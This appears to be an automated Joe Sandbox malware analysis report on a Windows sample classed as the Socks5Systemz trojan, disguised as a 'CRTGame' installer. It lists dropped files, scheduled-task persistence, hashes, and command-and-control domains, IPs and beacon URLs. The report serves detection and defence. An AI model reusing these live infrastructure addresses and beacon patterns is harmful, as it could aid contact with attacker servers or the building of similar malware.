                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1575089 Sample: AGcC2uK0El.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 9 other signatures 2->55 8 AGcC2uK0El.exe 2 2->8         started        process3 file4 33 C:\Users\user\AppData\...\AGcC2uK0El.tmp, PE32 8->33 dropped 11 AGcC2uK0El.tmp 17 76 8->11         started        process5 file6 35 C:\Program Files (x86)\CRTGame\crtgame.exe, PE32 11->35 dropped 37 C:\Program Files (x86)\...\is-PJ8MN.tmp, PE32 11->37 dropped 39 C:\Program Files (x86)\...\is-EATSP.tmp, PE32 11->39 dropped 41 106 other files (none is malicious) 11->41 dropped 57 Uses schtasks.exe or at.exe to add and modify task schedules 11->57 15 crtgame.exe 1 15 11->15         started        18 net.exe 1 11->18         started        20 crtgame.exe 1 2 11->20         started        23 schtasks.exe 1 11->23         started        signatures7 process8 dnsIp9 43 gpatxul.com 185.237.206.129, 49911, 49923, 49929 ITLDC-NLUA Ukraine 15->43 45 bmpkywz.com 94.232.249.187, 49818, 49849, 49879 INT-PDN-STE-ASSTEPDNInternalASSY Syrian Arab Republic 15->45 47 46.8.225.74, 2023, 49914, 49928 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 15->47 25 conhost.exe 18->25         started        27 net1.exe 1 18->27         started        31 C:\ProgramData\...\SHelperTrack.exe, PE32 20->31 dropped 29 conhost.exe 23->29         started        file10 process11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  AGcC2uK0El.exe58%VirustotalBrowse
                  AGcC2uK0El.exe55%ReversingLabsWin32.Trojan.Sockssystemz
                  AGcC2uK0El.exe100%AviraHEUR/AGEN.1332570
                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-2V0OO.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-4CPU3.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-5JD36.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-5QDBA.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-6S6NV.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-8DLTN.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-8JJ67.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-9A8PJ.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-AMJ3K.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-CHRTV.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-D10RQ.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-DG85B.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-DTLCM.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-E5NVS.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-FBHNA.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-GN0SC.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-H6A9P.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-HLDR5.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-I1OEI.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-I5CC7.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-J56NG.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-JISVL.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-JU8A8.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-KU7UG.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-LP9D8.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-LVBK5.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmp3%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://gpatxul.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb200%Avira URL Cloudsafe
                  http://185.237.206.129/en-GB0%Avira URL Cloudsafe
                  http://www.mp3dev.org/ID3Error0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn/trunk0%Avira URL Cloudsafe
                  http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde20%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svnrepository0%Avira URL Cloudsafe
                  http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde0%Avira URL Cloudsafe
                  http://185.237.206.129/0%Avira URL Cloudsafe
                  http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde0%Avira URL Cloudsafe
                  http://www.mpg123.de0%Avira URL Cloudsafe
                  http://lame.sf.net0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn/trunkrepository0%Avira URL Cloudsafe
                  gpatxul.com0%Avira URL Cloudsafe
                  http://mingw-w64.sourceforge.net/X0%Avira URL Cloudsafe
                  http://bmpkywz.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c80%Avira URL Cloudsafe
                  http://LosslessAudio.org/00%Avira URL Cloudsafe
                  http://gpatxul.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c80%Avira URL Cloudsafe
                  http://94.232.249.187/0%Avira URL Cloudsafe
                  http://lame.sf.net32bits0%Avira URL Cloudsafe
                  http://www.mp3dev.org/0%Avira URL Cloudsafe
                  http://ocsps.ssl.com0Q0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  gpatxul.com
                  185.237.206.129
                  truetrue
                    unknown
                    bmpkywz.com
                    94.232.249.187
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://gpatxul.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20true
                      • Avira URL Cloud: safe
                      unknown
                      http://gpatxul.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8true
                      • Avira URL Cloud: safe
                      unknown
                      gpatxul.comtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://bmpkywz.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8true
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.innosetup.com/AGcC2uK0El.tmp, AGcC2uK0El.tmp, 00000001.00000000.2055415237.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AGcC2uK0El.tmp.0.dr, is-785C0.tmp.1.drfalse
                        high
                        https://gcc.gnu.org/bugs/):is-H6A9P.tmp.1.drfalse
                          high
                          http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drfalse
                            high
                            https://mp4v2.googlecode.com/svn/trunkis-ODQUV.tmp.1.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://sectigo.com/CPS0is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drfalse
                              high
                              http://185.237.206.129/en-GBcrtgame.exe, 00000007.00000002.3299995322.0000000000902000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://ocsp.sectigo.com0is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drfalse
                                high
                                http://www.mp3dev.org/ID3Erroris-GN0SC.tmp.1.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cdecrtgame.exe, 00000007.00000002.3299995322.0000000000902000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.0000000000948000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62ddecrtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.0000000000948000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://mp4v2.googlecode.com/svnrepositoryis-ODQUV.tmp.1.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://ocsps.ssl.com0is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drfalse
                                  high
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sis-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drfalse
                                    high
                                    http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde2crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drfalse
                                      high
                                      http://185.237.206.129/crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.mpg123.deis-JISVL.tmp.1.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://mp4v2.googlecode.com/svn/trunkrepositoryis-ODQUV.tmp.1.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crls.ssl.com/ssl.com-rsa-RootCA.crl0is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drfalse
                                        high
                                        http://www.remobjects.com/psUAGcC2uK0El.exe, 00000000.00000003.2054765577.0000000002380000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.exe, 00000000.00000003.2054950745.0000000002088000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.tmp, 00000001.00000000.2055415237.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AGcC2uK0El.tmp.0.dr, is-785C0.tmp.1.drfalse
                                          high
                                          http://lame.sf.netis-GN0SC.tmp.1.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://streams.videolan.org/upload/is-5JD36.tmp.1.drfalse
                                            high
                                            http://mingw-w64.sourceforge.net/Xis-6S6NV.tmp.1.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.ssl.com/repository0is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drfalse
                                              high
                                              http://LosslessAudio.org/0is-DTLCM.tmp.1.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://lame.sf.net32bitsis-GN0SC.tmp.1.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.mp3dev.org/is-GN0SC.tmp.1.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://code.google.com/p/mp4v2Dis-ODQUV.tmp.1.drfalse
                                                high
                                                http://94.232.249.187/crtgame.exe, 00000007.00000002.3299995322.0000000000902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.remobjects.com/psAGcC2uK0El.exe, 00000000.00000003.2054765577.0000000002380000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.exe, 00000000.00000003.2054950745.0000000002088000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.tmp, AGcC2uK0El.tmp, 00000001.00000000.2055415237.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AGcC2uK0El.tmp.0.dr, is-785C0.tmp.1.drfalse
                                                  high
                                                  https://mp4v2.googlecode.com/svnis-ODQUV.tmp.1.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drfalse
                                                    high
                                                    http://ocsps.ssl.com0Qis-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.sqlite.org/copyright.html.is-E5NVS.tmp.1.drfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      46.8.225.74
                                                      unknownRussian Federation
                                                      28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                                      94.232.249.187
                                                      bmpkywz.comSyrian Arab Republic
                                                      29256INT-PDN-STE-ASSTEPDNInternalASSYtrue
                                                      185.237.206.129
                                                      gpatxul.comUkraine
                                                      21100ITLDC-NLUAtrue
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1575089
                                                      Start date and time:2024-12-14 12:01:10 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 14s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:AGcC2uK0El.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:3ec3e60970e2d0d38df3b5e571e8514d.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@15/128@7/3
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 95%
                                                      • Number of executed functions: 183
                                                      • Number of non-executed functions: 243
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      TimeTypeDescription
                                                      06:02:39API Interceptor384592x Sleep call for process: crtgame.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      46.8.225.746hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                        j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                          94.232.249.1876hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                            j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                              185.237.206.129Invoice.xlsxGet hashmaliciousFormBookBrowse
                                                              • 185.237.206.129/jinn.exe
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                              • 46.8.225.74
                                                              j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                              • 46.8.225.74
                                                              b3astmode.arm5.elfGet hashmaliciousMiraiBrowse
                                                              • 109.248.108.147
                                                              reduce.exeGet hashmaliciousGO BackdoorBrowse
                                                              • 46.8.236.61
                                                              InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                                              • 46.8.236.61
                                                              iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                                                              • 46.8.236.61
                                                              ppc.elfGet hashmaliciousMiraiBrowse
                                                              • 46.8.228.104
                                                              file.exeGet hashmaliciousCryptbotBrowse
                                                              • 46.8.237.112
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                              • 46.8.237.112
                                                              file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • 46.8.237.112
                                                              ITLDC-NLUAfile.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 185.174.173.22
                                                              secure.htmGet hashmaliciousHTMLPhisherBrowse
                                                              • 217.12.218.219
                                                              EIqeWlQMGR.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 185.174.175.187
                                                              9WqvcxYptm.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 185.174.173.22
                                                              sd2.ps1Get hashmaliciousUnknownBrowse
                                                              • 195.123.217.43
                                                              Pago_7839389309_8w20w808_723869189.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 185.174.175.187
                                                              RRT78-89079090GFVU0-INVRYU-FVIOJ0I.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 185.174.173.22
                                                              FATURA.exeGet hashmaliciousFormBookBrowse
                                                              • 185.174.173.22
                                                              TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                              • 185.174.173.22
                                                              Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                              • 185.174.173.22
                                                              INT-PDN-STE-ASSTEPDNInternalASSY6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                              • 94.232.249.187
                                                              j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                              • 94.232.249.187
                                                              jade.arm.elfGet hashmaliciousMiraiBrowse
                                                              • 31.9.99.97
                                                              jade.ppc.elfGet hashmaliciousMiraiBrowse
                                                              • 95.212.143.36
                                                              jade.x86.elfGet hashmaliciousMiraiBrowse
                                                              • 31.14.164.17
                                                              Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                              • 95.212.143.56
                                                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                              • 178.171.212.67
                                                              home.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 188.247.2.172
                                                              home.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 46.57.220.121
                                                              f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                              • 77.44.150.37
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  SecuriteInfo.com.Win32.Malware-gen.2354.25353.exeGet hashmaliciousUnknownBrowse
                                                                    SecuriteInfo.com.Win32.Malware-gen.2354.25353.exeGet hashmaliciousUnknownBrowse
                                                                      SecuriteInfo.com.Win32.Malware-gen.27540.30253.exeGet hashmaliciousUnknownBrowse
                                                                        SecuriteInfo.com.Win32.Malware-gen.27540.30253.exeGet hashmaliciousUnknownBrowse
                                                                          SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                                                                            SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                                                                              SecuriteInfo.com.Win32.Malware-gen.18181.11360.exeGet hashmaliciousUnknownBrowse
                                                                                SecuriteInfo.com.Win32.Malware-gen.18181.11360.exeGet hashmaliciousUnknownBrowse
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):337408
                                                                                  Entropy (8bit):6.515131904432587
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                  MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                  SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                  SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                  SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: 6hvZpn91O8.exe, Detection: malicious, Browse
                                                                                  • Filename: j9htknb7BQ.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.18181.11360.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.18181.11360.exe, Detection: malicious, Browse
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):26526
                                                                                  Entropy (8bit):4.600837395607617
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                                  MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                                  SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                                  SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                                  SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                                  Malicious:false
                                                                                  Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):214016
                                                                                  Entropy (8bit):6.676457645865373
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                                  MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                                  SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                                  SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                                  SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
